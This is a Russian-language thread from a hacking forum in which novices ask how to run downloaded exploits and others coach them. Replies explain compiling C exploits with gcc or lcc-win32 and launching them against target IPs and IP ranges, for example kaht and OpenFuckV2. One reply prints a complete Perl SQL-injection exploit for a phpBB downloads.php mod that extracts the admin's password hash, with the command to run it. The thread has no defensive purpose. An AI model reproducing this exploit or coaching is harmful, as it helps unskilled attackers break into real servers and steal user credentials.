• XSS.stack #1 – первый литературный журнал от юзеров форума

Как сплойты юзать?

Статус
Закрыто для дальнейших ответов.

eRweB

RAID-массив
Пользователь
Реакции
0
Вот слил я сплойт-екзешник.
Что с ним делать-то? Кака прога не запускается. Через ДОС чтоли?
Нихера не понимаю...

Большенство ксплойтов цмдешные...как юзать!под каждую уязвимость есть ксплойт...узнаёшь уязвимость ,ищешь к ней ксплойт,и юзаешь...Xspider тебе в помощь...7-ой ещё и ссылки к ксплойтам даёт...

Я вот слил сплойт-то, тока вот вся проблема в том что при их запуске на секкунду вылезает черный экран и все закрывается.
каков результат? чтож делать то надо? Как их включить...

Я кое чего юзал. Эксплоиты бывают разные. Большинство для командной строки. Вызываешь CMD и запускаешь эксплоит. Он скорее всего выдаст тебе список параметров, которые необходимо задавать. Далее все это дело указываешь и вперед. Только из попыток 20 одна удасться. Большинство бесплатных эксплоитов - вчерашний день. Толко ламерков вскрыть можно. Приватные эксплоиты стоят денег или в обмен чего-нибудь. Но это еще и найти нужно с кем и чем рассчитаться.

Пожалуйста, обратите внимание, что пользователь заблокирован
eRweB
Нажми на пуск,выбери "Выполнить..." и введи cmd (командная строка)
Там напиши путь к эксплоиту.И как уже сказал Ar3s вылезут возможности эксплоита. Дальше разберёшся сам...могу дать мануал по добычи инета)
В примере как раз используется эксплоит,заодно и потренируешся... B)

Кинь в сплойты про добычу инета.
Только вот я попробовал. путь к файлу тяжело прописывать...
Запутался я окончательно....

1) Компилируешь
2) Открываешь командную строку, прописываешь туда сплоит
3) Указываешь IP адрес атакуемого сервера
(4) Если сплоит биндит шелл, то ставишь порт шелла
4) Указываешь параметры -x для того или иного действия
5)нажимаешь "enter", ждешь:)

А вот вопрос интересует, вот на большенстве хак-сайтов есть уймы сплоитов, все они имеют расширение .С . Так вот хотел спросить тоесть нужно взять всё там записанное и вставить в компилятор?? Тогда, чем посоветуете компилить?

Для каждого сплойта разные компиляторы. Я тоже врубиться долго не мог. Иногда в комментах к сплойту пишут чем лучше компилить. Там даже типа некоторые сплойты и не включаются после компиляции не подходящим компиллером.

Во-вторых, авторы иногда преднамеренно допускают ошибки, не знаю зачем.
Чтоб уберечь свой сплоит от попадания в массы всякого рода ламо. :)

Так вот хотел спросить тоесть нужно взять всё там записанное и вставить в компилятор?? Тогда, чем посоветуете компилить?
Ну вобщем правильно. Большинство Сишных эксплойтосв можно скомпилить при помощи lcc-win32. C++ эксплойты можно компилить Борландским командно-строковым компилятором.

А вот вопрос интересует, вот на большенстве хак-сайтов есть уймы сплоитов, все они имеют расширение .С . Так вот хотел спросить тоесть нужно взять всё там записанное и вставить в компилятор?? Тогда, чем посоветуете компилить?
Я скажу так: во-первых, каждый эксплоит действительно пишется под разные компилы. Во-вторых, авторы иногда преднамеренно допускают ошибки, не знаю зачем. Просто для компилирования очень желательно знать Си (основной язык эксплоитов) и уметь модифицировать эксплоит под свои нужды...

Чтоб уберечь свой сплоит от попадания в массы всякого рода ламо. smile.gif
Ну да, по большому счету ты прав. Иначе бы каждый второй брал, качал компил, компилил эксплоит и хакал всех подряд... :lol:

Рассказываю....
1. Компилировать сишные сплойты можно разными компиляторами для этого языка, я использую lcc-win32 и gcc .
2. Ошибки допускаются авторами преднамеренно, дабы убереч интерне от хаосного взлома ламеров-полудурков. Человек, хоть немного знающему C/C++
не составит особого труда, чтоб проследить на каком этапе вознивает ошибка, найти в её в коде и исправить.
3. Больштнство сплойтов, работающих из командной строки следует запускать следующим образом: пуск> выполнить> "C:\sploit.exe ключь/параметр запуска".
Например по этому принципу работает всем известный kaht, в строке выполнить пишем путь и параметры: "C:\kaht.exe 80.65.142.1 80.65.142.255 300". Мы указываем kaht'у какой диапазон ему сканировать, в нашем случае это 80.65.142.1/255.

Как правило ключи/парамерты сплойта даются в хелпе к нету, либо на сайте откуда ты качал этот сплойт.

Wo0F
В целом ты обобщил все, о чем здесь базарили долгое время.
Добавлено [time]1113673880[/time]
Народ, выкладывайте здесь, кто может, ссылки на компиляторы, чтоб остальным не искать!

Это вы все про винду...))
Вот как это делается в linux
Например возьмем недавний сплоит для phpBB. Уяз был найден в модуле download.
Вот эксплоит:

#!/usr/bin/perl -w
use IO::Socket;

## Example:
## C:\>phpbb.pl www.site.com /phpBB2/ 2
##
## downloads.php mod in phpBB <= 2.0.13
## **********************************
## [~] Connecting...
## [ + ] Connected!
## [~] Sending Data...
## [~] Data Sent, Waiting for response...
## [ + ] MD5 Hash for user with id=2 is: 81dc9bdb52d04dc20036dbd8313ed055
##
if (@ARGV < 3)
{
print "\n\n";
print "|****************************************************************|\n";
print " phpBB <=2.0.13 'downloads.php' Mod\n";
print " Bug found by Axl And CereBrums\n";
print " Coded by CereBrums // 2/4/2005\n";
print " Usage: phpbb.pl <site> <folder> <user_id>\n";
print " e.g.: phpbb.pl www.site.com /phpBB2/ 2 \n";
print " [~] <server> - site address\n";
print " [~] <folder> - forum folder\n";
print " [~] <user_id> - user id (2 default for phpBB admin)\n";
print "|****************************************************************|\n";
print "\n\n";
exit(1);
}

$take = 0;
$success = 0;
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
print "\n downloads.php mod in phpBB <= 2.0.13\n";
print " **********************************\n";
print " [~] Connecting...\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "$socket error $!";

print " [ + ] Connected\n";
print " [~] Sending Data...\n";

$path = "http://$server/";
$path .= "/$folder/";
$path .= "downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0%20FROM%20phpbb_users%20WHERE%20user_id=$user_id/*";
print $socket "GET $path HTTP/1.0\r\n\r\n";

print " [~] Data Sent, Waiting for response...\n";

while ($answer = <$socket>)
{
if ($take == 1) {
$pass = substr($answer,51,32);
print " [ + ] MD5 Hash for user with id=$user_id is: $pass\n";
$success = 1;
$take = 0;
}
$found = rindex ($answer,"downloads.php?view=detail&id=0&cat=0");
if ( $found > -1 ) {
$take = 1;
}
}
if ($success==0) {print " [ - ] Exploit failed\n";}

## EOF ##
# milw0rm.com [2005-04-02]

Смотрим на каком програмном языке написан эксплоит. Делаем вывод что это Perl.
Создаем текстовый файл куда загоняем експлоит и обзываем этот файл exploit.pl
Всё теперь запускаем командную строку и прописываем команду

perl -w phpbb.pl www.site.com /phpBB2/ 2

Эксплоиты на языке C (также смотрим что за язык и придаем текстовому файлу расширение exploit.c) компилятся следующим образом

cc OpenFuckV2.c -o openssl

где сс это команда для компиляции; OpenFuckV2.c файл с эксплоитом; -o команда; openssl имя для запуска эксплоита из командной строки.
В итоге набираем в командной строке ./openssl и цель умирает)))

Вообще авторы иногда указывают каким компилятором лучше компиллить. Я обычно использую gcc, для меня он THE BEST

Полагаю, что немаловажным окажется тот факт, что не все сплоиты можно просто так взять и скомпилировать. Я готов отдать руку на отсечение, что большинство людей спрашивающих что такое эксплоит не имеют понятия про *nix - овые системы. Поэтому важно уметь отличать эксплоиты которые должны компилироваться под виндой и те которые нужно компилить в никсах.

Что такое *NIX - лучше не спрашивайте. Просто почитайте статьи про Unix, Linux, FreeBSD и т.д. :rtfm: :tease:
Добавлено [time]1113829003[/time]
Замечу еще. Если не хотите гемороя. зайте уже собранные готовые EXE-шники. Они обычно гораздо проще в обращении. ПРИМЕР - KAHT!!!!

Статус
Закрыто для дальнейших ответов.
Верх